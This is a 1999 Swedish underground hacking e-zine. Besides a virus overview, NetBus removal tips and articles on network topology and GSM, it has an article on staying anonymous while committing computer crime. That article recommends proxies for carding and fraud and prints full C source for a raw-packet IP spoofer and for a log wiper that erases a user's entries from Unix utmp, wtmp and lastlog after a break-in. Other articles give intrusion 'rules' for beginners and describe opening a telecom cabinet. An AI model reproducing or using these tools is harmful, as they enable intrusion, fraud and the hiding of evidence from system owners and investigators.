OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
16:51 1999-02-12
Heretics Inc. Presenterar...
O U T L A W I N F O R M A T I V A
issue #2
Sysslar Judar med Carding ?
___
( )________________________
¦ ¦ \ [¯¯¯¯]
¦01 ¦ Disclaimer ¦ ¦ H ¦ #Phreak.se
¦02 ¦ Ledare ¦ ¦ e ¦
¦03 ¦ Medverkande ¦ ¦ r ¦ #Phreakers
¦04 ¦ Kommande Projekt ¦__¦ e ¦
¦ ¦-------------------------¦ t ¦ #Programming.se
¦05 ¦ En flaska Virus ¦ i ¦
¦06 ¦ Nätverkstopologier ¦¯¯¦ c ¦ #PhreakCity
¦06 ¦ Dom gyllene reglerna ¦ ¦ s ¦
¦07 ¦ Annonymitet vid brott ¦ ¦ ¦ #Trada
¦ ¦-------------------------¦ ¦ I ¦
¦08 ¦ C-Skåp med 5 fingrar ¦ ¦ n ¦ #Swehack
¦09 ¦ Telia med GSM ¦ ¦ c ¦
¦10 ¦ Säkerhetsbrister i GSM ¦ [____]
¦11 ¦ Fiberoptik för Newbies ¦
¦12 ¦ Hemliga frekvenser ¦
¦13 ¦ Svensk Beige Boxing ¦
¦ ¦-------------------------¦
¦14 ¦ Programstrukturer ¦
¦ ¦-------------------------¦
¦15 ¦ Ett par IRCnet kanaler ¦
¦16 ¦ Köpes och Säljes ¦
¦17 ¦ Frågor och kanske svar ¦
¦18 ¦ Copyright ¦
¦19 ¦ Prenumeration ¦
(___)··························
www.heretics.freeservers.com
o----------------------------------------------------------------------o
¦[01] Disclaimer knash ¦
o----------------------------------------------------------------------o
Denna information är endast skriven som underhållning och informations
syfte. Denna information kan vara olaglig så vi tar inget ansvar för
dina handlingar med denna information.
____________________________OBS!__________________________
Det är absolut förbjudet för alla myndighetspersoner och
personer utsedda av dessa att läsa detta e-zine utan min
skriftliga tillåtelse eller order om husrannsakan.
Överträdelse leder till att all information publicerad här
kommer att underkännas som bevisföring i svensk domstol
enligt Svea Rikes Lag. När jag bryter mot PUL gör jag det
i egenskap av journalist el. konstnär, välj själv vilket.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
o----------------------------------------------------------------------o
¦[01] Ledare knash ¦
o----------------------------------------------------------------------o
Tjenare, nu ett tag efter 1:a numret så släpps detta nummer, 1:a numret
blev stort och det var ju också meningen. OverMarZz joinar gruppen
eftersom han är aktiv och kommer att hjälpa till med diverse saker.
Nu börjar det sega ner i min programmering igen, jag måste börja satsa
på allvar. På senaste tiden har jag privat utbildat mig i
Telekommunikation. Men när det blir något lov eller liknande så ska
jag bli antisocialist och ta tag i programmeringen. Jag vill ju
verkligen lära mig, men det går segt eftersom det är avancerat och inte
minst för mig som är 13 år. Folk säger att jag ska börja med Pascal och
Vbasic men jag vill syssla med avancerade språk, spelar ingen roll hur
avancerat det är, jag kommer att ha mera nytta av C++ i framtiden, både
när jag ska söka jobb och i privata projekt som t.ex. socket
programmering som är mycket bra i C++. 114 prenumeranter på Outlaw
Informativa på inte alls speciellt kort tid, men förhoppningvis kommer
dessa att bli flera.
o----------------------------------------------------------------------o
¦[02] Medverkande knash ¦
o----------------------------------------------------------------------o
¤ Knash
¤ knash@linux.nu
¤ Founder
¤ OverMarZz_
¤ mixtile112@hotmail.com
¤ Member
¤ crazy-train (Evil^Phreakz0r)
¤ crazy-train@telia.se
¤ Proud Member =)
¤ Dreamfish
¤ Dark_Side@death-star.com
¤ Member
¤ TheClown
¤ orkar@inte
¤ Inte medlem, bidrog med en artikel.
o----------------------------------------------------------------------o
¦[03] Kommande Projekt knash ¦
o----------------------------------------------------------------------o
Jag håller på att skriva en textfil om Säkerhet, grundläggande info
kommer det då att bli. Jag kommer att ta upp ämnen som Virus, Trojaner
, Brandväggar, Kryptering. Om det är någon som har information om
Nätverks Säkerhet så skicka det direkt till knash@linux.nu. Jag letar
även efter information om Firewalls, alltså hur man ska konfiguera dem
och så.
______________________________________________________
{Information wants to be Free, Knowledge is not a Crime}
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
o----------------------------------------------------------------------o
¦[04] En flaska Virus knash ¦
o----------------------------------------------------------------------o
Här kommer lite enkel grundläggande information kring Virus även lite
information om Trojaner följer.
¤ Skydd mot Virus
Det finns olika slags skydd mot Virus, det bästa skyddet är att låta bli
att ladda hem filer från opålitliga websidor och alltid kontrollera
disketter och andra lagrings diskar. Men det går att andvända mjukvara
som söker efter Virus på diskar och i minnet. Själv andvänder jag
Dr Solomon's Anti Virus Toolkit som jag tycker fungerar bra, om du köper
det så får du en diskett i brevlådan gratis varje gång då Virus
databasen uppdateras. Men Dr Solomon's är då inte den enda,
McAfee Anti-Virus, eSafe, F-PROT Professional Anti-Virus Toolkit och
Panda AntiVirus för att bara nämna några.
¤ Makrovirus
Makroviruset kan smitta alla typer av operativ system, viruset sprider
sig via Word 6.0 filer. För att skydda sig så kan ett AntiVirus program
andvändas, ett tips är att andvända ett nytt AntiVirus program eftersom
Makrovirus är en ny typ av Virus.
¤ Partitionssektor Virus
Partionsektorn är den första delen som datorn läser när den startar
datorn. Partionsektorn är mycket känslig för radering av info eftersom
den innehåller information om skivan (såsom antalet sektorer i varje
partition och var DOS-partitionen börjar), och ett litet program. När
PC:n startar läser den partitionssektorn, laddar programmet till minnet
och kör det. Partionsektor virus är som ett Bootsektor virus bara att
det är svårare att hitta. Många program som kontrollerar lagrings skivor
(t.e.x DEBUG) tillåter inte att kolla på partionsektorn. Disktetter har
ingen partionsektor så Partionsektor virus beter sig exakt som ett
Bootsektor virus.
¤ Bootsektor Virus
Bootsektorn är den första delen på en Diskett och på en hårdisk är den
den första delen på DOS-Partionen, den innehåller information om disken
eller disketten (såsom t.ex. antalet sektorer i den logiska enheten)
När datorn startas läser den Boot-partionen från den disk som angetts i
BIOS Setup (A: som standard) om den inte hittar den så läser den nästa
disk (C: som standard) när den hittar ett program så laddar den det i
minnet och kör igång det. Ett Bootsektor virur fungerar på så sätt att
den ersätter Bootsektorn med sin egen kod och flyttar sen den gamla
Bootsektorn någon annanstanns. När viruset lagt sig bekvämt i
Bootsektorn så startar det varje gång datorn startar. Dom flesta
Bootsektor virus infekterar bara disketter men det finns även dom som
infekterar hårdiskar. Master Boot Record är ett exempel på ett Virus som
infekterar hårdiskar och AntiExe är ett exempel på ett Bootsektor Virus
som infekterar disketter.
¤ Överskrivande Virus
Gör precis som titeln säger skriver över filer så som systemfiler och
befintliga filer i systemet. Överskrivande Virus sprider sig inte så
snabbt eftersom dom lätt kan upptäckas. HLLO är en familj med
överskrivande i virus och alla är skrivna i högnivåspråk.
¤ Kombinationsvirus
Är ett Virus som andvänder sig mera än 1 för att sprida sig och
infektera körbara filer, bootsektorn och partionsektorn. Som normalt kan
detta virus inte föröka sig i Windows 95.
¤ Droppers
En Dropper är egentligen inte ett virus utan den får dig tro göra något
medans den gör något annat, i vanliga fall installerar ett Virus medans
den visar upp ett flashigt demo.
theipspoof.zip på 310229 bytes som innehåller 2 filer, Spoof.dmo på
124928 bytes och IPSpoof.exe på 64000 bytes. Vem vill inte vara anonym ?
Denna IP Spoofer i själva fallet en Back Orifice trojan. Det står på
många underground relaterade sidor att detta är den bästa IP Spoofern
på marknanden.
¤ Worm
Ett virus som kopierar sig själv, behöver inte nödvändigtvis vara ett
Virus. Worms och Virus brukar ofta kombineras. The Morris Worm som höll
på att sänka hela Internet, eller på den tiden ARPANET som det hette.
The Morris Worm var skriven av Robert T. Morris som studerade på
Cornell University. Wormen skapade en anslutning till en dator och
kopierade sig själv till den kommande dator för att sedan sprida sig
vidare. Det finns mycket inforamtion om "The Morris Worm" det är bara
söka efter det om du tycker att denna information inte räckte till.
¤ Netbus
Netbus är en trojan som är precis som på namnet en Nät Buss. Netbus
består av en server och en klient.
Namn: Storlek: Status:
Path.exe 472 576 bytes Server
NetBus.exe 567 296 bytes Klient
NetBus.rtf 24 113 Dokumenation
Path.exe
Kan döpas om till vilket namn som helst. Ikonen är en blå ring med en
brinnande grå fackla på. Servern lägger sig i Registret (User.dat och
System.dat) Registret kan hanteras med C:\Windows\regedit.exe.
När servern är installerad så ligger den i...
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
\run innehåller sträng värden för program som automatiskt ska startas
när datorn startas. För att ta bort server (eller patchen) så går det
ner i dos läge, alltså Start/Avlsuta/Starta om datorn i MS-DOS läge.
du handlar antagligen i C:\Windows när datorn ligger i DOS läge så
därför skriver du följande.
Microsoft(R) Windows 95
(C)Copyright Microsoft Corp 1981-1996.
C:\WINDOWS>rm patch.exe
Detta beror självklart på serverns namn. För att leta efter server så
trycker du på Start/Sök/Filer eller mappar/ sen trycker du på Bläddra
och väljer C:\Windows. Skriv sedan in *.*exe i Namn fältet. Det kommer
följas av en massa program listas och nu är det bara leta efter
servern. Det du ska kolla efter är ikonen som beskrivs ovan.
Ett annat tips om du enbart vill skydda dig är att sätta kontroll för
på porten som Netbus andvänder. Den porten Netbus andvänder är 12345
och kan blockeras med Nuke Nabber2.x. Du börjar med att klicka dig
fram till File/Options/Advanced. Klick a på "unassigned" och vid
"Port to monitor" skriver du in "12345" som är den porten Netbus
andvänder och vid "Protocol" väljer du "tcp"
Det kommer att se ut så här om någon ansluter...
[02/05/1999 17:19:47.340 GMT+0100] Connection: localhost.swip.net (127.
0.0.1) on port 12345 (tcp).
[02/05/1999 17:19:55.680 GMT+0100] Disconnect: localhost.swip.net (127.
0.0.1) on port 12345 (tcp).
Lägg märke till att jag andvänd radbryte ovan !
Jag har läst att man kan ta bort Netbus genom att ta bort nyckeln
/nomsg i registret. Jag antar att du endast behöver söka efter den,
alltså Redigera/Sök
Om du vill veta om du har Netbus över huvudtaget så kan du andvända
telnet för att ansluta till just den porten som andvänds. Parametrarna
är enkla, tryck Start/Kör och skriv sedan in "telnet localhost 12345"
Du kan även skriva "telnet 127.0.0.1 det är samma som localhost.
Localhost menas alltså den lokala dator (den datorn du andvänder)
Nu har jag gjort en idiot förklaring till hur man blir av med Netbus,
så nu borde alla fatta. Den bestä säkerheten är ändå att aldrig ta emot
filer som du inte vet vad dom innehåller. Du ska inte heller lita på
någon om han/hon säger att det är ett demo eller spel.
¤ Netbuster
Netbuster är som på namnet ett program som stoppar andvändare
och är programmerat av Håkan Bergström. Vilka funktioner har Netbuster
då ? Netbuster kan scanna registrets autostart och även i minnet efter
Netbus servern och som du vet så kan man med Netbus visa bilder, spela
upp ljud och ladda hem/upp filer på hårdisken. Vid fliken Files finns
det lite inställningar så du kan visa saker som egentligen inte finns.
Om en andvändare skulle ansluta till din dator med Netbus, så kan han
ta en Skärmdump mycket enkelt, i Netbuster kan du istället göra så en
annan bild visas upp. Om någon skulle skicka ett message så kan du
istället stället ställa in så Netbuster skickar ett message till
andvändaren, inställningar sker under fliken Messages. Under fliken
Logfile visas logg filen. I logg filen så finner du all information
vem som anslutit till din dator och när personen ansluter.
o----------------------------------------------------------------------o
¦[05] Nätverkstopologier crazy-train ¦
o----------------------------------------------------------------------o
Med nätverkstopologi menas det geometriska utseende som utgörs av nätets
media, enheter och noder. De vanligaste topologierna är:
¤ BUS-nät
¤ Stjärnnät
¤ Ringnät
¤ Slingnät
o BUS-Nät
BUS tekniken är ett utvecklingssteg från datorernas överförings-BUS som
"adopterats" av LAN-tekniken. I datorerna sker överföring av information
med parallell-BUS, dvs alla bit i den operationen eller det ASCII-tecken
som skall transporteras tillsammans med kontroll informationen, sker i
ett "svep". I ett LAN kan ej denna teknik användas, informationen sänds
istället seriellt med hög hastighet.
I ett BUS-nät är samtliga noder anslutna till en gemensam kabel, den sk
transmissions-BUS. Det förekommer två tekniker, basband och bredband.
Signifikant för BUS-nätet är att det meddelande som sändande nod ger
upphov till, samtidigt mottages av alla övriga noder. Endast den
utrustning som meddelandet är destinerat till, känner igen adressen och
tar emot meddelandet. Metodiken är analog med ett POLL-SELECT system där
värddatorn i tur och ordning POLLAR anslutna terminaler och styrenheter
(CLUSTER). BUS-topologin kallas också för trädtopologi.
o Stjärnnät
I ett stjärnnät har varje ansluten nod sin unika förbindelse till en för
alla övriga noder och förbindelser gemensam central nod. Ett representa-
tivt exempel på stjärnnät, är de abbonentväxlar som överför både data
och talkommunikation (PRIVATE AUTOMATIX BRANSCH EXCHANGE - PABX). I den
generation abbonentväxlar som är tillgänglig i Sverige, används digital
programmeringsstyrd teknik. Detta har gjort det möjligt att även använda
växlarna för dataöverföring. I abbonentledningens termineringspunkt
finns det en speciell telefonutrustning, till vilken en terminal med
standardiserat gränssnitt kan kopplas in. I PABX:erna finns det en
utrustning sin separerar data och tal. Oberoende av varandra kan tal och
data fördmedlas på samma trådpar.
Räckvidden för lokalabonnentledning är c:a 1-2 Km vilket gör att nätet
kan ha sin spridning inom en viss radie. Genom utrbrutna väljarsteg som
lokaliseras på andra platser, kan PABX nätet ökas i räckvidd och
omfattning. För extern datatrafik förses PABX:en med en gemensam resurs
som består med ett antal modem i en POOL för trafik på det allmänna
telenätet (internet).
o Ringnät
Vid ett ringnät är varje nod ansluten till en långserie av
sammankopplade punkt-till-punkt förbindelser. Varje nod är förbunden med
närmast förgående och efterföljande nod. Datatrafiken cirkulerar runt i
ringen från nod till nod där signaöen regenereras och förstärks innan
den sänds vidare. Fördröjningen inom varje nod blir mycket kort, endast
några få bit då ej hela meddelandet buffras i noderna. När ett
meddelande nåt adressatnod och har godkänts, plockas det bort ur den
ändlösa dataströmmen. Överföringshastigheterna på mediat ligger inom
intervallet 1-10 Mbit/s. De vanligaste accessmetoderna i ett ringnät är:
*Token Passing
*Slotted Ring
*Empty Slot.
*Register Insert.
En huvudnod på ringen kontrollerar och övervakar trafiken och kan
ingripa vid felsituationer. Nackdelen med ett ringnät är att ett avbrott
på förbindelsen försätter hela nätet ur funktion. För att säkerställa
detta, är ringnäten i bland konstruerade med dubbla ringar, Med ett
dubbelt ringnät kan man också klara montering av nya noder i "flykten"
trots att datatrafik pågår. Aktiva komponenter ingår i noderna och om en
nod slutar att fungera, kan också nätet försättas ur funktion. För att
förebygga datta är noderna vid f eltilfällen och nätspänningsfrånfall.
o Slingnät
Ett slingnät kan liknas vid en enkelspårig järnvägslinje där data trans-
porteras mellan stationer och linjens ändhållplatser. En markant
skillnad mellan sling och ringnät, är slingnätets centrala nod som styr
och övervakar trafiken. Möjligheten till direkttrafik mellan övriga
noder finns ej.
ÖVERFÖRINGSMEDIA.
Mediat är bäraren av all information i ett datanät. Det finns ett
flertal att upprätta ett LAN.
*Tvinnade par (Twisted pair)
*Flatkabel
*Fiberoptik
*Koaxialkabel
- Enkabel
- Tvåkabel
*Infraröd överföring
*Radioöverföring
- mikrovåg
- radiolänk
- satellit
o----------------------------------------------------------------------o
¦[06] Dom gyllene reglerna (inom hacking Dreamfish ¦
o----------------------------------------------------------------------o
Så vitt som jag har förstått så är en majoritet av våra kära läsare
intresserade av datorer (Bra att jag har förstått) och oxå intresserade
av att kunna bryta sig in i andras datasystem ...Men vad är det om man
inte vet dom oskrivna reglerna. Om du är väl införstådd inom ämnet
hacking ,så sluta läs nu och hoppa över till nästa artikel. Det här är
för dom på inlärningsstadiet. Nåväl här börjar vi.......
1. Skada aldrig ett system .
Varför ?:
Jo först och främst så klassas du inte längre som en hacker vi har nu
bytt till det inte lika glamourösa cracker. Vad mer ,jo den som har
blivit crackad känner ett större behag att hämnas.
2. Ändra inte i andras systemfiler ,förutom dom som kan påvisa att dom
befunnit dig i Han/Hon/Deras dator och dom som kan ge dig fortsatt
access.
Varför?:
Ändra inte kopiera istället ,för ändringar behövs inte om du inte
känner för att lämna lockbete efter dig själv.
3. Dela inte information om dina projekt med sådana du inte kan lite
fullt ut på .
Varför?:
Har du aldrig blivit tillfrågad att utge någons namn för att det är
bäst för den själv. Dom man känner har alltid ett hopp på en
varesig man skall bättra sig eller göra ett bättre hack nästa gång.
4. När du "sätter en lapp på anslagstavlan" (BBS = Bulletin Board
Systems) Var så försiktig som möjlig med dina beskrivningar om vad
du gjort som möjligt.
V?:
BBS kan avlyssnas ...Om du inte visste det redan (Reds.amm).
5. Använd ALDRIG ditt riktiga namn eller telenr när du chattar på
Irc/Icq .
V?:
Kan du inte lista ut det själv. =)
6. Lämna aldrig ditt underskrift/Tag eller dylikt när du hackar.
V?:
Vi vet hur det gick för tjuven i Rosa Pantern filmerna ..
7. Hacka dig aldrig in i statsägda datorer.
V:?
Staten har den grymmaste datastyrkan i landet , din dator är nada mot
deras.
o----------------------------------------------------------------------o
¦[07] Annonymitet vid datorbrott OverMarZz ¦
o----------------------------------------------------------------------o
Rapport klar: 04:36 9 february 1999
overmarzz@level8.com
Http://www.level8.com
Introduktion: Anledningen till att jag fick ett flipp och började på
denna filen är enkel, dom flesta lamers, newbies och wannabies
använder program som "Win spoof" med mera när dom vill vara anonyma,
Men de flesta av de programmen funkar inte.
Och när dom loggar in som anonymos login tror dom att dom verkligen är
anonyma. Det finns många sätt att vara annonym på, jag har skrivit
några grunder här men om man är proffs inom tcp/ip så skrattar man nog
en bra stund åt denna texten.
Jag frånsäger mig inte något som helst ansvar för att meningen är att
inget ska hända därmed inget ansvar.
1) Ip spoofing
1.1 Dölj din ip genom en proxy server
1.2 Shell kod till en ip spoofer för linux
o----------------------------------------------------------------------o
(1)
Ip spoofing
Detta är bra vid bedrägeri på hemsidor såväl vid "Carding"
som vid utnyttjande av exp PHF buggen.
1.1 Via en Proxy
Gå in i Ms-dos prompten och skriv ping proxy.algonet.se
om du då får medelandet 'bad IP' eller nåt i den stilen så menas det
att det helt enkelt inte finns nån proxy där, men om du får ett icmp
echo så finns det en.
Hotmail och aol har sådana som är användar vänliga, försök på dom.
Omdu kör linux så antar jag var du använder kommandot 'ping'.
I Netscape, tryck på Options|Network Preferences (förutsatt att du har
En engelsk version) klicka sen på Proxy fliken och kolla radio button
'Manual Proxy config' och tryck sen 'view'. Ställ nu in det för det
protocollet du vill använda, (vissa Proxies använder bara HTTP)
oftast finns där att välja mellan FTP och HTTP. Den vanligaste porten
som proxies använder är 8080 men inte nödvändigtvis
I Internet Explorer, tryck på View|Options|
Tryck sen 'Connection' fliken och sätt upp det som i netscape.
Nu kommer inte din Ip adress visas i Guestbooks, counterlogs, ftp och
http. Du kan maila i tex hotmail anonymt nu eller carda nån stans utan
bekymmer
1.2 Ip spoofer för linux
Denna är skiven i C, för linux.
***
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
unsigned short ip_cksum(unsigned char * buff, int len)
{
unsigned long sum = 0;
if (len > 3)
{
__asm__("clc\n"
"1:\t"
"lodsl\n\t"
"adcl %%eax, %%ebx\n\t"
"loop 1b\n\t"
"adcl $0, %%ebx\n\t"
"movl %%ebx, %%eax\n\t"
"shrl $16, %%eax\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum) , "=S" (buff)
: "0" (sum), "c" (len >> 2) ,"1" (buff)
: "ax", "cx", "si", "bx" );
}
if (len & 2)
{
__asm__("lodsw\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff)
: "0" (sum), "1" (buff)
: "bx", "ax", "si");
}
if (len & 1)
{
__asm__("lodsb\n\t"
"movb $0, %%ah\n\t"
"addw %%ax, %%bx\n\t"
"adcw $0, %%bx"
: "=b" (sum), "=S" (buff)
: "0" (sum), "1" (buff)
: "bx", "ax", "si");
}
sum =~sum;
return(sum & 0xffff);
}
unsigned short tcp_check(struct tcphdr *th, int len,
unsigned long saddr, unsigned long daddr)
{
unsigned long sum;
__asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
"
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx
jb 2f
shrl $5, %%ecx
clc
1: lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
loop 1b
adcl $0, %%ebx
movl %%edx, %%ecx
2: andl $28, %%ecx
je 4f
shrl $2, %%ecx
clc
3: lodsl
adcl %%eax, %%ebx
loop 3b
adcl $0, %%ebx
4: movl $0, %%eax
testw $2, %%dx
je 5f
lodsw
addl %%eax, %%ebx
adcl $0, %%ebx
movw $0, %%ax
5: test $1, %%edx
je 6f
lodsb
addl %%eax, %%ebx
adcl $0, %%ebx
6: movl %%ebx, %%eax
shrl $16, %%eax
addw %%ax, %%bx
adcw $0, %%bx
"
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si" );
/* We only want the bottom 16 bits, but we never cleared the top 16. */
return((~sum) & 0xffff);
}
void resolve_address(struct sockaddr *addr, char *hostname, u_short port) {
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *)addr;
(void) bzero((char *)address, sizeof(struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_port = htons(port);
address->sin_addr.s_addr = inet_addr(hostname);
if ((int)address->sin_addr.s_addr == -1) {
host = gethostbyname(hostname);
if (host) {
bcopy( host->h_addr, (char *)&address->sin_addr, host->h_length);
}
else {
puts("Couldn't resolve address!!!");
exit(-1);
}
}
}
char *create_ip(u_long source, u_long dest, u_char protocol, u_char ttl,
u_short id, char *data, int data_len)
{
char *ip_datagram;
struct iphdr *ip_header;
ip_datagram = malloc(sizeof(struct iphdr) + data_len);
ip_header = ip_datagram;
ip_header->version = 4;
ip_header->tos = 0;
ip_header->frag_off = 0;
ip_header->check = 0;
ip_header->saddr = source;
ip_header->daddr = dest;
ip_header->protocol = protocol;
ip_header->ttl = ttl;
ip_header->id = htons(id);
ip_header->ihl = 5;
ip_header->tot_len = htons(sizeof(struct iphdr) + data_len);
ip_header->check = htons(ip_cksum(ip_datagram,sizeof(struct iphdr)));
bcopy(data,ip_datagram+sizeof(struct iphdr),data_len);
return ip_datagram;
}
char *create_tcp(u_long source, u_long dest, u_short sport, u_short dport,
u_long seqnum, u_long acknum, u_char flags, char *data, int datalen)
{
char *wewt;
struct tcphdr *tcp_header;
wewt = malloc(sizeof(struct tcphdr) + datalen);
tcp_header = wewt;
tcp_header->th_sport = sport;
tcp_header->th_dport = dport;
tcp_header->th_seq = seqnum;
tcp_header->th_ack = acknum;
tcp_header->th_flags = flags;
tcp_header->th_sum = 0;
tcp_header->th_sum = htons(tcp_check(tcp_header, sizeof(struct tcphdr),
source, dest));
bcopy(data,wewt+sizeof(struct tcphdr),datalen);
return wewt;
}
void sendpack(char *fromhost, int fromport, char *tohost, int toport) {
char *packet;
char *tcppacket;
char *sendme;
static struct sockaddr_in local, remote;
static int sock = 0;
if (!sock) {
resolve_address((struct sockaddr *)&local, fromhost, fromport);
resolve_address((struct sockaddr *)&remote, tohost, toport);
sock = socket(AF_INET, SOCK_RAW, 255);
if (sock == -1) { perror("Getting raw socket"); exit(-1); }
}
tcppacket = create_tcp(&local.sin_addr, &remote.sin_addr,
local.sin_port, remote.sin_port, 795930600, 0, TH_SYN,
NULL, 0);
packet = create_ip(&local.sin_addr, &remote.sin_addr,
6, 24, 4, NULL, 0);
sendme = (struct iphdr *)packet;
bcopy(tcppacket, sendme+sizeof(struct iphdr), sizeof(tcppacket));
printf("the ip header is %d bytes long.\n", sizeof(struct iphdr));
printf("the tcp header is %d bytes long.\n", sizeof(struct tcphdr));
printf("the ip packet is %d bytes long.\n", sizeof(packet));
printf("the tcp packet is %d bytes long.\n", sizeof(tcppacket));
printf("the final packet is %d bytes long.\n", sizeof(sendme));
{
int result;
result = sendto(sock, packet, sizeof(packet), 0,
(struct sockaddr *)&remote, sizeof(remote));
if (result != sizeof(packet)) { perror("sending packet"); }
}
}
main(int argc, char **argv) {
if (argc!=5) {
printf("usage: %s <from host> <from port> <to host> <to port>\n", argv[0]);
exit(-1);
}
printf("forging packet from %s.%d to %s.%d\n", argv[1], atoi(argv[2]),
argv[3], atoi(argv[4]));
sendpack(argv[1], atoi(argv[2]), argv[3], atoi(argv[4]));
}
o----------------------------------------------------------------------o
(2)
Unix loggar
Detta är användbart när du brutit dig in i ett Unix system och inte
vill bli upptäckt, för när ett företag kommer på ett intrång så ändras
lösenord och då blir du tvungen att hacka Unix:en igen men då kan dom
ha dragit in ditt andra konto du hadde hos dom
Dom huvudsakliga loggarna ligger under:
/etc/utmp, /usr/adm/wtmp Och /usr/adm/lastlog .
De är inte text philer utan måste öppnas av speciella program.
Här nedan är ett program som är användbart för det
***
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
o----------------------------------------------------------------------o
¦[08] C-Skåp med 5 fingrar knash ¦
o----------------------------------------------------------------------o
Jag och en skön polare; aemkey drog till någon sunkit disco som någon
fritidsgård hade anordnat. Kvällens sommarväder låg på -13º, skummet i
ölen hade fryst till en is-sörja. Men inget hindrade 2 Heretics
Scouter att dricka för jävlig öl. Nu hade tiden gott och vi hade fått i
oss ett par öl och spytt på toan uppe vid macken ett par gånger. Vi stod
fortfarnande i det varma vädret och väntade på att solen skulle titta
fram, jag vände mig om och gnuggade mig i ögonen och fick syn på ett
C-Skåp trodde jag. Jag gick fram för att kolla och det va verkligen ett
C-Skåp. Jag stoppade in fingrarna i den lilla glipan som fanns och drog
lite och efter ett tags tänkade så kom jag fram till att man kunde dra
upp boxen. Så jag hojtade efter aemkey och bad han försöka. Han lydde
min uppmaning och drog upp skåpet med inte allt för högt pang, vi
kollade efter en massa linor och gamla terminaler. Vi stängde och
lämnade boxen eftersom det va ganska mycket folk ute. Allt aemkey gjorde
va att stoppa in 5 fingrar som visserligen va frysta och blåa.
o----------------------------------------------------------------------o
¦[09] Telia med Gsm crazy-train ¦
o----------------------------------------------------------------------o
Telia först i världen med att göra fältförsök i praktiken - Upp till
fyra gånger snabbare dataöverföring i GSM. Telia Mobile demonstrerade
nyligen HSCSD, High Speed Circuit Switch Data, i praktiken i sitt
nätverk. Applikationen har levererats av Ericsson och det var första
gången någonsin som HSCSD visades i praktiken. Operatörerna kommer att
kunna dra nytta av tjänsten på många sätt och användarna kommer märka
att kommunikationen går snabbare när det gäller dataöverföring via GSM.
Applikationen gör det möjligt att snabba på datakommunikationens inträde
på GSM-näten. I den första fasen kommer HSCSD att tillhandahålla en
bithastighet på häpnadsväckande 38.4 kbp/s. För slutanvändaren innebär
applikationen att viss informationsöverföring går snabbare, som bäst upp
till fyra gånger snabbare. Överföringshastighet och prestanda är
grundläggande för leverantörerna. När man läser sin e-post eller
söker genom företagets intranet är hastighet och enkelhet avgörande för
slutanvändaren.
En högre bithastighet betyder fler nöjda abonnenter, utmärkta affärstil-
lfällen och en inkörsport till bättre applikationer för datakommunikati-
on och nya teknologier som GPRS. Allt detta är viktigt för operatörerna.
Genom att erbjuda högre hastighet kan nya typer av trådlösa
applikationer, exempelvis fjärrstyrd videoövervakning, utvecklas och
befintliga applikationer fungera smidigare vilket resulterar i nöjdare
kunder.
Källa: www.telia.se
o----------------------------------------------------------------------o
¦[10] Säkerhetsbrister i GSM crazy-train ¦
o----------------------------------------------------------------------o
Telia kommenterar Säpo - chefen Anders Erikssons uttalande angående
säkerheten i GSM.
